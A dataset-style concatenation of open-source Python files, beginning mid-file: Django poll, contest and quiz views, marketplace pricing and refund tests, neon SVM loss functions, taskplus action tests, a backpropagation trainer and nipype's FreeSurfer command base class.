domain=Site.objects.get_current().domain,
secure=None
)
return response
@csrf_protect
@require_POST
@transaction.commit_on_success
def survey_vote(request, survey_id):
survey_ct = ContentType.objects.get_for_model(Survey)
survey = get_cached_object_or_404(survey_ct, pk=survey_id)
url = get_next_url(request)
# activity check
if not survey.current_activity_state == polls_settings.ACTIVITY_ACTIVE:
return HttpResponseRedirect(url)
# vote check
if survey_check_vote(request, survey) != polls_settings.USER_NOT_YET_VOTED:
return HttpResponseRedirect(url)
form = QuestionForm(survey)(request.POST)
# invalid input
if not form.is_valid():
# no choice selected error - via session
sess_nv = request.session.get(polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME, [])
sess_nv.append(survey.id)
request.session[polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME] = sess_nv
return HttpResponseRedirect(url)
# vote save
kwa = {}
if request.user.is_authenticated():
kwa['user'] = request.user
kwa['ip_address'] = request.META['REMOTE_ADDR']
survey.vote(form.cleaned_data['choice'], **kwa)
# just voted info session update
sess_jv = request.session.get(polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME, [])
sess_jv.append(survey.id)
request.session[polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME] = sess_jv
response = HttpResponseRedirect(url)
# authenticated user vote - session update
if request.user.is_authenticated():
sess = request.session.get(polls_settings.SURVEY_COOKIE_NAME, [])
sess.append(survey.id)
request.session[polls_settings.SURVEY_COOKIE_NAME] = sess
    # anonymous user vote - cookies update
else:
cook = request.COOKIES.get(polls_settings.SURVEY_COOKIE_NAME, '').split(',')
if len(cook) > polls_settings.SURVEY_MAX_COOKIE_LENGTH:
cook = cook[1:]
cook.append(str(survey.id))
expires = datetime.strftime(datetime.utcnow() + timedelta(seconds=polls_settings.SURVEY_MAX_COOKIE_AGE), "%a, %d-%b-%Y %H:%M:%S GMT")
response.set_cookie(
polls_settings.SURVEY_COOKIE_NAME,
value=','.join(cook),
max_age=polls_settings.SURVEY_MAX_COOKIE_AGE,
expires=expires,
path='/',
domain=Site.objects.get_current().domain,
secure=None
)
return response
@csrf_protect
@transaction.commit_on_success
def contest_vote(request, context):
contest = context['object']
forms = []
forms_are_valid = True
# question forms
for question in contest.questions:
form = QuestionForm(question)(request.POST or None, prefix=str(question.id))
if not form.is_valid():
forms_are_valid = False
forms.append((question, form))
# contestant form
initial = {}
if request.user.is_authenticated():
initial['name'] = request.user.first_name
initial['surname'] = request.user.last_name
initial['email'] = request.user.email
contestant_form = ContestantForm(request.POST or None, initial=initial)
if not contestant_form.is_valid():
forms_are_valid = False
# saving contestant
if forms_are_valid and contest.is_active():
return contest_finish(request, context, forms, contestant_form)
context.update({
'forms' : forms,
'contestant_form' : contestant_form,
'activity_not_yet_active' : polls_settings.ACTIVITY_NOT_YET_ACTIVE,
'activity_active' : polls_settings.ACTIVITY_ACTIVE,
'activity_closed' : polls_settings.ACTIVITY_CLOSED
})
return render_to_response(
get_templates_from_publishable('form.html', context['object']),
context,
context_instance=RequestContext(request)
)
class MyCheckboxSelectMultiple(forms.CheckboxSelectMultiple):
def render(self, name, value, attrs=None, choices=()):
if value is None: value = []
has_id = attrs and 'id' in attrs
final_attrs = self.build_attrs(attrs, name=name)
str_values = set([force_unicode(v) for v in value]) # Normalize to strings.
for i, (option_value, option_label) in enumerate(chain(self.choices, choices)):
# If an ID attribute was given, add a numeric index as a suffix,
# so that the checkboxes don't all have the same ID attribute.
if has_id:
final_attrs = dict(final_attrs, id='%s_%s' % (attrs['id'], i))
cb = forms.CheckboxInput(final_attrs, check_test=lambda value: value in str_values)
option_value = force_unicode(option_value)
yield mark_safe(u'<label>%s %s</label>' % (cb.render(name, option_value), force_unicode(option_label)))
class MyRadioSelect(forms.RadioSelect):
def render(self, name, value, attrs=None, choices=()):
return self.get_renderer(name, value, attrs, choices)
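# fudge_choice_percentages nudges rounded percentages so they sum to exactly 100:
# e.g. three choices that each round to 33 (total 99) have one percentage bumped
# to 34, cycling through the choices one step at a time (illustrative example).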
def fudge_choice_percentages(choices):
percent_sum = 0
choice_list = list(choices)
for choice in choice_list:
choice.percentage = choice.get_percentage()
percent_sum += choice.percentage
choice_iter = cycle(choice_list)
step = cmp(100, percent_sum)
while percent_sum != 100:
choice = choice_iter.next()
choice.percentage += step
percent_sum += step
return choice_list
def QuestionForm(question):
if question.allow_multiple:
choice_field = forms.ModelMultipleChoiceField(
queryset=question.choices,
widget=MyCheckboxSelectMultiple,
required=not question.allow_no_choice
)
else:
choice_field = forms.ModelChoiceField(
queryset=question.choices,
widget=MyRadioSelect,
empty_label=None,
required=not question.allow_no_choice
)
class _QuestionForm(forms.Form):
"""
Question form with all its choices
"""
choice = choice_field
def choices(self):
field = self['choice']
# TODO: move choice percentage to question and use it here!!
choice_list = fudge_choice_percentages(field.field.queryset)
for choice, input in zip(choice_list, field.as_widget(field.field.widget)):
yield choice, input
return _QuestionForm
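# Typical use (as in poll_vote above): form = QuestionForm(poll.question)(request.POST)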
class ContestantForm(forms.Form):
name = Contestant._meta.get_field('name').formfield()
surname = Contestant._meta.get_field('surname').formfield()
email = Contestant._meta.get_field('email').formfield()
phonenumber = Contestant._meta.get_field('phonenumber').formfield()
address = Contestant._meta.get_field('address').formfield()
count_guess = Contestant._meta.get_field('count_guess').formfield()
def clean(self):
# TODO - antispam
return self.cleaned_data
@transaction.commit_on_success
def contest_finish(request, context, qforms, contestant_form):
contest = context['object']
email = contestant_form.cleaned_data['email']
if Contestant.objects.filter(email=email, contest=contest).count() > 0:
context.update({
'duplicate' : True,
'forms' : qforms,
'contestant_form' : contestant_form,
})
return render_to_response(
get_templates_from_publishable('form.html', context['object']),
context,
context_instance=RequestContext(request)
)
choices = '|'.join(
'%d:%s' % (
question.id,
question.allow_multiple and ','.join(str(c.id) for c in sorted(f.cleaned_data['choice'], key=lambda ch: ch.id)) or f.cleaned_data['choice'].id)
for question, f in sorted(qforms, key=lambda q: q[0].id)
)
c = Contestant(
contest=contest,
choices=choices,
**contestant_form.cleaned_data
)
if request.user.is_authenticated():
c.user = request.user
c.save()
return HttpResponseRedirect(contest.get_absolute_url() + slugify(ugettext('result')) + u'/')
def contest_result(request, context):
return render_to_response(
get_templates_from_publishable('result.html', context['object']),
context,
context_instance=RequestContext(request)
)
def contest_conditions(request, context):
return render_to_response(
get_templates_from_publishable('conditions.html', context['object']),
context,
context_instance=RequestContext(request)
)
RESULT_FIELD = 'results'
class QuizWizard(FormWizard):
def __init__(self, quiz):
form_list = [ QuestionForm(q) for q in quiz.questions ]
super(QuizWizard, self).__init__(form_list)
self.quiz = quiz
self.extra_context = {'object' : quiz, 'question' : quiz.questions[0], 'category' : quiz.category, }
def get_template(self, step):
return get_templates_from_publishable('step.html', self.extra_context['object'])
def process_step(self, request, form, step):
if (step + 1) < len(self.form_list):
self.extra_context['question'] = self.quiz.questions[step + 1]
def done(self, request, form_list):
points = 0
results = []
for question, f in zip(self.quiz.questions, form_list):
if not question.allow_no_choice:
if question.allow_multiple:
points += sum(c.points for c in f.cleaned_data['choice'])
results.append('%d:%s' % (question.id, ','.join(str(c.id) for c in f.cleaned_data['choice'])))
else:
points += f.cleaned_data['choice'].points
results.append('%d:%s' % (question.id, f.cleaned_data['choice'].id))
results = '|'.join(results)
result = self.quiz.get_result(points)
result.count += 1
result.save()
self.extra_context.update(
{
'result' : result,
'points' : points,
'results' : results,
'result_field': RESULT_FIELD,
'result_action' : self.quiz.get_absolute_url() + slugify(_('results')) + '/'
}
)
return render_to_response(
get_templates_from_publishable('result.html', self.extra_context['object']),
self.extra_context,
context_instance=RequestContext(request)
)
def result_details(request, context):
quiz = context['object']
if not quiz.has_correct_answers:
raise Http404
results = request.GET.get(RESULT_FIELD, '').split('|')
if len(results) != len(quiz.questions):
raise Http404
questions = []
for question, q_res in zip(quiz.questions, results):
q_id, id_list = q_res.split(':')
choices = question.choices
if question.allow_multiple:
cl = set(id_list.split(','))
for ch in choices:
if str(ch.id) in cl:
ch.chosen = True
else:
for ch in choices:
if str(ch.id) == id_list:
ch.chosen = True
break
questions.append((question, choices))
context['questions'] = questions
return render_to_response(
get_templates_from_publishable('result_detail.html', context['object']),
context,
context_instance=RequestContext(request)
)
@csrf_protect
def contest(request, context):
return contest_vote(request, context)
@csrf_protect
def quiz(request, context):
quiz = context['object']
return QuizWizard(quiz)(request, extra_context=context)
|
ella/ella-polls
|
ella_polls/views.py
|
Python
|
bsd-3-clause
| 18,977
|
import datetime
from decimal import Decimal
from django.utils import translation
import mock
from nose.tools import eq_, ok_
import amo
import amo.tests
from addons.models import Addon, AddonUser
from constants.payments import PROVIDER_BANGO, PROVIDER_BOKU
from market.models import AddonPremium, Price, PriceCurrency, Refund
from mkt.constants import apps
from mkt.constants.regions import (ALL_REGION_IDS, BR, HU,
SPAIN, UK, US, RESTOFWORLD)
from stats.models import Contribution
from users.models import UserProfile
class TestPremium(amo.tests.TestCase):
fixtures = ['market/prices.json', 'base/addon_3615.json']
def setUp(self):
self.tier_one = Price.objects.get(pk=1)
self.addon = Addon.objects.get(pk=3615)
def test_is_complete(self):
ap = AddonPremium(addon=self.addon)
assert not ap.is_complete()
ap.price = self.tier_one
assert not ap.is_complete()
ap.addon.paypal_id = 'asd'
assert ap.is_complete()
class TestPrice(amo.tests.TestCase):
fixtures = ['market/prices.json']
def setUp(self):
self.tier_one = Price.objects.get(pk=1)
if hasattr(Price, '_currencies'):
del Price._currencies # needed to pick up fixtures.
def test_active(self):
eq_(Price.objects.count(), 2)
eq_(Price.objects.active().count(), 1)
def test_active_order(self):
Price.objects.create(name='USD', price='0.00')
Price.objects.create(name='USD', price='1.99')
eq_(list(Price.objects.active().values_list('price', flat=True)),
[Decimal('0.00'), Decimal('0.99'), Decimal('1.99')])
def test_method_default_all(self):
price = Price.objects.create(name='USD', price='0.00')
eq_(price.method, 2)
def test_method_specified(self):
price = Price.objects.create(name='USD', price='0.99', method=0)
eq_(price.method, 0)
def test_currency(self):
eq_(self.tier_one.pricecurrency_set.count(), 3)
def test_get(self):
eq_(Price.objects.get(pk=1).get_price(), Decimal('0.99'))
def test_get_tier(self):
translation.activate('en_CA')
eq_(Price.objects.get(pk=1).get_price(), Decimal('0.99'))
eq_(Price.objects.get(pk=1).get_price_locale(), u'US$0.99')
def test_get_tier_and_locale(self):
translation.activate('pt_BR')
eq_(Price.objects.get(pk=2).get_price(), Decimal('1.99'))
eq_(Price.objects.get(pk=2).get_price_locale(), u'US$1,99')
def test_no_region(self):
eq_(Price.objects.get(pk=2).get_price_locale(region=HU.id), None)
def test_fallback(self):
translation.activate('foo')
eq_(Price.objects.get(pk=1).get_price(), Decimal('0.99'))
eq_(Price.objects.get(pk=1).get_price_locale(), u'$0.99')
def test_transformer(self):
price = Price.objects.get(pk=1)
price.get_price_locale()
# Warm up Price._currencies.
with self.assertNumQueries(0):
eq_(price.get_price_locale(), u'$0.99')
def test_get_tier_price(self):
eq_(Price.objects.get(pk=2).get_price_locale(region=BR.id), 'R$1.01')
def test_get_tier_price_provider(self):
# Because we specify Boku, there is no tier to be found.
eq_(Price.objects.get(pk=2)
.get_price_locale(region=BR.id, provider=PROVIDER_BOKU), None)
# Turning on Boku will give us the tier.
PriceCurrency.objects.get(pk=3).update(provider=PROVIDER_BOKU)
eq_(Price.objects.get(pk=2)
.get_price_locale(region=BR.id, provider=PROVIDER_BOKU), 'R$1.01')
def test_get_free_tier_price(self):
price = self.make_price('0.00')
eq_(price.get_price_locale(region=US.id), '$0.00')
def test_euro_placement(self):
with self.activate('en-us'):
eq_(Price.objects.get(pk=2).get_price_locale(region=SPAIN.id),
u'\u20ac0.50')
with self.activate('es'):
eq_(Price.objects.get(pk=2).get_price_locale(region=SPAIN.id),
u'0,50\xa0\u20ac')
def test_prices(self):
currencies = Price.objects.get(pk=1).prices()
eq_(len(currencies), 2)
eq_(currencies[0]['currency'], 'PLN')
def test_wrong_currency(self):
bad = 4999
ok_(bad not in ALL_REGION_IDS)
ok_(not Price.objects.get(pk=1).get_price('foo', region=bad))
def test_prices_provider(self):
currencies = Price.objects.get(pk=1).prices(provider=PROVIDER_BANGO)
eq_(len(currencies), 2)
def test_multiple_providers(self):
PriceCurrency.objects.get(pk=2).update(provider=PROVIDER_BOKU)
        # This used to be 0, so changing it to 3 puts it in scope of the filter.
with self.settings(PAYMENT_PROVIDERS=['bango', 'boku']):
currencies = Price.objects.get(pk=1).prices()
eq_(len(currencies), 3)
def test_region_ids_by_name_multi_provider(self):
with self.settings(PAYMENT_PROVIDERS=['bango', 'boku']):
eq_(Price.objects.get(pk=2).region_ids_by_name(),
[BR.id, SPAIN.id, UK.id, RESTOFWORLD.id])
def test_region_ids_by_name(self):
eq_(Price.objects.get(pk=2).region_ids_by_name(),
[BR.id, SPAIN.id, RESTOFWORLD.id])
def test_region_ids_by_name_w_provider_boku(self):
eq_(Price.objects.get(pk=2).region_ids_by_name(
provider=PROVIDER_BOKU), [UK.id])
def test_region_ids_by_name_w_provider_bango(self):
eq_(Price.objects.get(pk=2).region_ids_by_name(
provider=PROVIDER_BANGO), [BR.id, SPAIN.id, RESTOFWORLD.id])
def test_provider_regions(self):
with self.settings(PAYMENT_PROVIDERS=['bango', 'boku']):
eq_(Price.objects.get(pk=2).provider_regions(), {
PROVIDER_BANGO: [BR, SPAIN, RESTOFWORLD],
PROVIDER_BOKU: [UK]})
def test_provider_regions_boku(self):
with self.settings(PAYMENT_PROVIDERS=['boku']):
eq_(Price.objects.get(pk=2).provider_regions(), {
PROVIDER_BOKU: [UK]})
def test_provider_regions_bango(self):
with self.settings(PAYMENT_PROVIDERS=['bango']):
eq_(Price.objects.get(pk=2).provider_regions(), {
PROVIDER_BANGO: [BR, SPAIN, RESTOFWORLD]})
class TestPriceCurrencyChanges(amo.tests.TestCase):
def setUp(self):
self.addon = amo.tests.addon_factory()
self.make_premium(self.addon)
self.currency = self.addon.premium.price.pricecurrency_set.all()[0]
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_save(self, index_webapps):
self.currency.save()
eq_(index_webapps.delay.call_args[0][0], [self.addon.pk])
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_delete(self, index_webapps):
self.currency.delete()
eq_(index_webapps.delay.call_args[0][0], [self.addon.pk])
class ContributionMixin(object):
def setUp(self):
self.addon = Addon.objects.get(pk=3615)
self.user = UserProfile.objects.get(pk=999)
def create(self, type):
return Contribution.objects.create(type=type, addon=self.addon,
user=self.user)
def purchased(self):
return (self.addon.addonpurchase_set
.filter(user=self.user, type=amo.CONTRIB_PURCHASE)
.exists())
def type(self):
return self.addon.addonpurchase_set.get(user=self.user).type
class TestContribution(ContributionMixin, amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/users']
def test_purchase(self):
self.create(amo.CONTRIB_PURCHASE)
assert self.purchased()
def test_refund(self):
self.create(amo.CONTRIB_REFUND)
assert not self.purchased()
def test_purchase_and_refund(self):
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_REFUND)
assert not self.purchased()
eq_(self.type(), amo.CONTRIB_REFUND)
def test_refund_and_purchase(self):
# This refund does nothing, there was nothing there to refund.
self.create(amo.CONTRIB_REFUND)
self.create(amo.CONTRIB_PURCHASE)
assert self.purchased()
eq_(self.type(), amo.CONTRIB_PURCHASE)
def test_really_cant_decide(self):
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_REFUND)
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_REFUND)
self.create(amo.CONTRIB_PURCHASE)
assert self.purchased()
eq_(self.type(), amo.CONTRIB_PURCHASE)
def test_purchase_and_chargeback(self):
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_CHARGEBACK)
assert not self.purchased()
eq_(self.type(), amo.CONTRIB_CHARGEBACK)
def test_other_user(self):
other = UserProfile.objects.get(email='admin@mozilla.com')
Contribution.objects.create(type=amo.CONTRIB_PURCHASE,
addon=self.addon, user=other)
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_REFUND)
eq_(self.addon.addonpurchase_set.filter(user=other).count(), 1)
def set_role(self, role):
AddonUser.objects.create(addon=self.addon, user=self.user, role=role)
self.create(amo.CONTRIB_PURCHASE)
installed = self.user.installed_set.filter(addon=self.addon)
eq_(installed.count(), 1)
eq_(installed[0].install_type, apps.INSTALL_TYPE_DEVELOPER)
def test_user_dev(self):
self.set_role(amo.AUTHOR_ROLE_DEV)
def test_user_owner(self):
self.set_role(amo.AUTHOR_ROLE_OWNER)
def test_user_installed_dev(self):
self.create(amo.CONTRIB_PURCHASE)
eq_(self.user.installed_set.filter(addon=self.addon).count(), 1)
def test_user_not_purchased(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
eq_(list(self.user.purchase_ids()), [])
def test_user_purchased(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
self.addon.addonpurchase_set.create(user=self.user)
eq_(list(self.user.purchase_ids()), [3615L])
def test_user_refunded(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
self.addon.addonpurchase_set.create(user=self.user,
type=amo.CONTRIB_REFUND)
eq_(list(self.user.purchase_ids()), [])
def test_user_cache(self):
# Tests that the purchase_ids caches.
self.addon.update(premium_type=amo.ADDON_PREMIUM)
eq_(list(self.user.purchase_ids()), [])
self.create(amo.CONTRIB_PURCHASE)
eq_(list(self.user.purchase_ids()), [3615L])
# This caches.
eq_(list(self.user.purchase_ids()), [3615L])
self.create(amo.CONTRIB_REFUND)
eq_(list(self.user.purchase_ids()), [])
class TestRefundContribution(ContributionMixin, amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/users']
def setUp(self):
super(TestRefundContribution, self).setUp()
self.contribution = self.create(amo.CONTRIB_PURCHASE)
def do_refund(self, expected, status, refund_reason=None,
rejection_reason=None):
"""Checks that a refund is enqueued and contains the correct values."""
self.contribution.enqueue_refund(status, self.user,
refund_reason=refund_reason,
rejection_reason=rejection_reason)
expected.update(contribution=self.contribution, status=status)
eq_(Refund.objects.count(), 1)
refund = Refund.objects.filter(**expected)
eq_(refund.exists(), True)
return refund[0]
def test_pending(self):
reason = 'this is bloody bullocks, mate'
expected = dict(refund_reason=reason,
requested__isnull=False,
approved=None,
declined=None)
refund = self.do_refund(expected, amo.REFUND_PENDING, reason)
self.assertCloseToNow(refund.requested)
def test_pending_to_approved(self):
reason = 'this is bloody bullocks, mate'
expected = dict(refund_reason=reason,
requested__isnull=False,
approved=None,
declined=None)
refund = self.do_refund(expected, amo.REFUND_PENDING, reason)
self.assertCloseToNow(refund.requested)
# Change `requested` date to some date in the past.
requested_date = refund.requested - datetime.timedelta(hours=1)
refund.requested = requested_date
refund.save()
expected = dict(refund_reason=reason,
requested__isnull=False,
approved__isnull=False,
declined=None)
refund = self.do_refund(expected, amo.REFUND_APPROVED)
eq_(refund.requested, requested_date,
'Expected date `requested` to remain unchanged.')
self.assertCloseToNow(refund.approved)
def test_approved_instant(self):
expected = dict(refund_reason='',
requested__isnull=False,
approved__isnull=False,
declined=None)
refund = self.do_refund(expected, amo.REFUND_APPROVED_INSTANT)
self.assertCloseToNow(refund.requested)
self.assertCloseToNow(refund.approved)
def test_pending_to_declined(self):
refund_reason = 'please, bro'
rejection_reason = 'sorry, brah'
expected = dict(refund_reason=refund_reason,
rejection_reason='',
requested__isnull=False,
approved=None,
declined=None)
refund = self.do_refund(expected, amo.REFUND_PENDING, refund_reason)
self.assertCloseToNow(refund.requested)
requested_date = refund.requested - datetime.timedelta(hours=1)
refund.requested = requested_date
refund.save()
expected = dict(refund_reason=refund_reason,
rejection_reason=rejection_reason,
requested__isnull=False,
approved=None,
declined__isnull=False)
refund = self.do_refund(expected, amo.REFUND_DECLINED,
rejection_reason=rejection_reason)
eq_(refund.requested, requested_date,
'Expected date `requested` to remain unchanged.')
self.assertCloseToNow(refund.declined)
class TestRefundManager(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/users']
def setUp(self):
self.addon = Addon.objects.get(id=3615)
self.user = UserProfile.objects.get(email='del@icio.us')
self.expected = {}
for status in amo.REFUND_STATUSES.keys():
c = Contribution.objects.create(addon=self.addon, user=self.user,
type=amo.CONTRIB_PURCHASE)
self.expected[status] = Refund.objects.create(contribution=c,
status=status,
user=self.user)
def test_all(self):
eq_(sorted(Refund.objects.values_list('id', flat=True)),
sorted(e.id for e in self.expected.values()))
def test_pending(self):
eq_(list(Refund.objects.pending(self.addon)),
[self.expected[amo.REFUND_PENDING]])
def test_approved(self):
eq_(list(Refund.objects.approved(self.addon)),
[self.expected[amo.REFUND_APPROVED]])
def test_instant(self):
eq_(list(Refund.objects.instant(self.addon)),
[self.expected[amo.REFUND_APPROVED_INSTANT]])
def test_declined(self):
eq_(list(Refund.objects.declined(self.addon)),
[self.expected[amo.REFUND_DECLINED]])
def test_by_addon(self):
other = Addon.objects.create(type=amo.ADDON_WEBAPP)
c = Contribution.objects.create(addon=other, user=self.user,
type=amo.CONTRIB_PURCHASE)
ref = Refund.objects.create(contribution=c, status=amo.REFUND_DECLINED,
user=self.user)
declined = Refund.objects.filter(status=amo.REFUND_DECLINED)
eq_(sorted(r.id for r in declined),
sorted(r.id for r in [self.expected[amo.REFUND_DECLINED], ref]))
eq_(sorted(r.id for r in Refund.objects.by_addon(addon=self.addon)),
sorted(r.id for r in self.expected.values()))
eq_(list(Refund.objects.by_addon(addon=other)), [ref])
|
jinankjain/zamboni
|
apps/market/tests/test_models.py
|
Python
|
bsd-3-clause
| 16,762
|
from neon.transforms.cost import Cost
class MulticlsSVMLoss(Cost):
def __init__(self, delta=1.):
self.delta = delta
def __call__(self, y, t):
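        # Squared multiclass hinge: with y_c the true-class score (recovered via
        # max over y * t), each sample contributes
        # 0.5 * sum_j max(0, y_j - y_c + delta)^2, averaged over the batch.
        # Note the j == true-class term adds a constant 0.5 * delta**2 per sample.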
T = self.be.empty_like(y)
T[:] = self.be.max(y * t, axis=0)
# T = self.be.array(self.be.max(y * t, axis=0).asnumpyarray(), y.shape[0], axis=0)
margin = self.be.square(self.be.maximum(0, y - T + self.delta)) * 0.5
return self.be.sum(margin) / self.be.bsz
def bprop(self, y, t):
T = self.be.empty_like(y)
T[:] = self.be.max(y * t, axis=0)
return self.be.maximum(0, y - T + self.delta) / self.be.bsz
class L1SVMLoss(Cost):
def __init__(self, C=10):
self.C = C
def __call__(self, y, t):
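        # Squared hinge for binary targets: (t * 2 - 1) maps {0, 1} labels to
        # {-1, +1}; the 0.5 * C-weighted sum of max(0, 1 - y * t')^2 is then
        # divided by y.shape[0] (the number of output units).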
return self.C * self.be.sum(self.be.square(self.be.maximum(0, 1 - y * (t * 2 - 1)))) * 0.5 / y.shape[0]
def bprop(self, y, t):
return - self.C * (t * 2 - 1) * self.be.maximum(0, 1 - y * (t * 2 - 1)) / self.be.bsz / y.shape[0]
|
cs-chan/fuzzyDCN
|
prune_neon/transformation/cost.py
|
Python
|
bsd-3-clause
| 979
|
from unittest import mock
from taskplus.core.actions import GetRoleDetailsAction, GetRoleDetailsRequest
from taskplus.core.domain import UserRole
from taskplus.core.shared.response import ResponseFailure
def test_get_role_details_action():
role = mock.Mock()
role = UserRole(name='admin', id=1)
roles_repo = mock.Mock()
roles_repo.one.return_value = role
request = GetRoleDetailsRequest(role.id)
action = GetRoleDetailsAction(roles_repo)
response = action.execute(request)
assert bool(response) is True
roles_repo.one.assert_called_once_with(role.id)
assert response.value == role
def test_get_role_details_action_with_hooks():
role = mock.Mock()
role = UserRole(name='admin', id=1)
roles_repo = mock.Mock()
roles_repo.one.return_value = role
request = GetRoleDetailsRequest(role.id)
action = GetRoleDetailsAction(roles_repo)
before = mock.MagicMock()
after = mock.MagicMock()
action.add_before_execution_hook(before)
action.add_after_execution_hook(after)
response = action.execute(request)
assert before.called
assert after.called
assert bool(response) is True
roles_repo.one.assert_called_once_with(role.id)
assert response.value == role
def test_get_role_details_action_handles_bad_request():
role = mock.Mock()
role = UserRole(name='admin', id=1)
roles_repo = mock.Mock()
roles_repo.one.return_value = role
request = GetRoleDetailsRequest(role_id=None)
action = GetRoleDetailsAction(roles_repo)
response = action.execute(request)
assert bool(response) is False
assert not roles_repo.one.called
assert response.value == {
'type': ResponseFailure.PARAMETER_ERROR,
'message': 'role_id: is required'
}
def test_get_role_details_action_handles_generic_error():
error_message = 'Error!!!'
roles_repo = mock.Mock()
roles_repo.one.side_effect = Exception(error_message)
request = GetRoleDetailsRequest(role_id=1)
action = GetRoleDetailsAction(roles_repo)
response = action.execute(request)
assert bool(response) is False
roles_repo.one.assert_called_once_with(1)
assert response.value == {
'type': ResponseFailure.SYSTEM_ERROR,
'message': 'Exception: {}'.format(error_message)
}
|
Himon-SYNCRAFT/taskplus
|
tests/core/actions/get_role_details/test_get_role_details_action.py
|
Python
|
bsd-3-clause
| 2,317
|
import math
import net
SIGMOID = 0
TANH = 1
class bp:
def __init__(self, net, learning_rate, momentum):
self.type = net.getType()
self.net = net
self.lr = learning_rate
self.m = momentum
self.layer = net.getLayer()
        # Build the last-change (momentum) matrix from independent sub-lists;
        # repeating a nested list with `*` would alias the same inner list.
        self.lc = [[[0] * max(self.layer) for _ in range(max(self.layer))]
                   for _ in range(len(self.layer))]
def _dfunc(self, y):
if self.type==SIGMOID:
return y * (1.0 - y)
else:
return 1.0 - y**2
def setLearningRate(self,x):
self.lr = x
def setMomentum(self, x):
self.m = x
def backPropagate(self, input, target):
        if len(target) != self.layer[-1]:
            raise ValueError('Wrong number of target values: got %d, expected %d'
                             % (len(target), self.layer[-1]))
self.net.process(input)
nlayer = len(self.layer)
delta = []
for i in range(0, nlayer):
delta.append([0.0] * self.layer[i])
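        # Output-layer deltas: activation derivative times (target - output).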
for i in range(0,self.layer[nlayer-1]):
node = self.net.getNode(nlayer-1, i)
error = target[i] - node
delta[nlayer-1][i] = self._dfunc(node) * error
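        # Hidden-layer deltas: propagate errors backwards through the weights.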
for l in range(nlayer-2, 0, -1):
for i in range(0, self.layer[l]):
error = 0.0
for j in range(0, self.layer[l+1]):
error = error + delta[l+1][j] * self.net.getWeight(l+1, i, j)
delta[l][i] = self._dfunc(self.net.getNode(l,i)) * error
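        # Update weights (learning rate * gradient + momentum * last change) and biases.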
for l in range(nlayer-2, -1, -1):
for i in range(0, self.layer[l]):
for j in range(0, self.layer[l+1]):
change = delta[l+1][j] * self.net.getNode(l, i)
w = self.net.getWeight(l+1, i, j) + self.lr * change + self.m * self.lc[l+1][i][j]
self.net.setWeight(l+1, i, j, w)
self.lc[l+1][i][j] = change
for i in range(0, self.layer[l+1]):
b = self.net.getBias(l+1, i) + delta[l+1][i]
self.net.setBias(l+1, i, b)
error = 0.0
for i in range(0, len(target)):
error = error + 0.5 * (target[i] - self.net.getNode(nlayer-1, i))**2
return error
|
bongtrop/cilab-python
|
ann/bp.py
|
Python
|
bsd-3-clause
| 1,933
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""The freesurfer module provides basic functions for interfacing with
freesurfer tools.
Currently these tools are supported:
* Dicom2Nifti: using mri_convert
* Resample: using mri_convert
Examples
--------
See the docstrings for the individual classes for 'working' examples.
"""
__docformat__ = 'restructuredtext'
from builtins import object
import os
from ..base import (CommandLine, Directory,
CommandLineInputSpec, isdefined,
traits, TraitedSpec, File)
from ...utils.filemanip import fname_presuffix
class Info(object):
""" Freesurfer subject directory and version information.
Examples
--------
>>> from nipype.interfaces.freesurfer import Info
>>> Info.version() # doctest: +SKIP
>>> Info.subjectsdir() # doctest: +SKIP
"""
@staticmethod
def version():
"""Check for freesurfer version on system
Find which freesurfer is being used....and get version from
/path/to/freesurfer/build-stamp.txt
Returns
-------
version : string
version number as string
or None if freesurfer version not found
"""
fs_home = os.getenv('FREESURFER_HOME')
if fs_home is None:
return None
versionfile = os.path.join(fs_home, 'build-stamp.txt')
if not os.path.exists(versionfile):
return None
fid = open(versionfile, 'rt')
version = fid.readline()
fid.close()
return version
@classmethod
def subjectsdir(cls):
"""Check the global SUBJECTS_DIR
Parameters
----------
subjects_dir : string
The system defined subjects directory
Returns
-------
subject_dir : string
Represents the current environment setting of SUBJECTS_DIR
"""
if cls.version():
return os.environ['SUBJECTS_DIR']
return None
class FSTraitedSpec(CommandLineInputSpec):
subjects_dir = Directory(exists=True, desc='subjects directory')
class FSCommand(CommandLine):
"""General support for FreeSurfer commands.
Every FS command accepts 'subjects_dir' input.
"""
input_spec = FSTraitedSpec
_subjects_dir = None
def __init__(self, **inputs):
super(FSCommand, self).__init__(**inputs)
self.inputs.on_trait_change(self._subjects_dir_update, 'subjects_dir')
if not self._subjects_dir:
self._subjects_dir = Info.subjectsdir()
if not isdefined(self.inputs.subjects_dir) and self._subjects_dir:
self.inputs.subjects_dir = self._subjects_dir
self._subjects_dir_update()
def _subjects_dir_update(self):
if self.inputs.subjects_dir:
self.inputs.environ.update({'SUBJECTS_DIR':
self.inputs.subjects_dir})
@classmethod
def set_default_subjects_dir(cls, subjects_dir):
cls._subjects_dir = subjects_dir
def run(self, **inputs):
if 'subjects_dir' in inputs:
self.inputs.subjects_dir = inputs['subjects_dir']
self._subjects_dir_update()
return super(FSCommand, self).run(**inputs)
def _gen_fname(self, basename, fname=None, cwd=None, suffix='_fs',
use_ext=True):
'''Define a generic mapping for a single outfile
The filename is potentially autogenerated by suffixing inputs.infile
Parameters
----------
basename : string (required)
filename to base the new filename on
fname : string
if not None, just use this fname
cwd : string
prefix paths with cwd, otherwise os.getcwd()
suffix : string
default suffix
'''
if basename == '':
msg = 'Unable to generate filename for command %s. ' % self.cmd
msg += 'basename is not set!'
raise ValueError(msg)
if cwd is None:
cwd = os.getcwd()
fname = fname_presuffix(basename, suffix=suffix,
use_ext=use_ext, newpath=cwd)
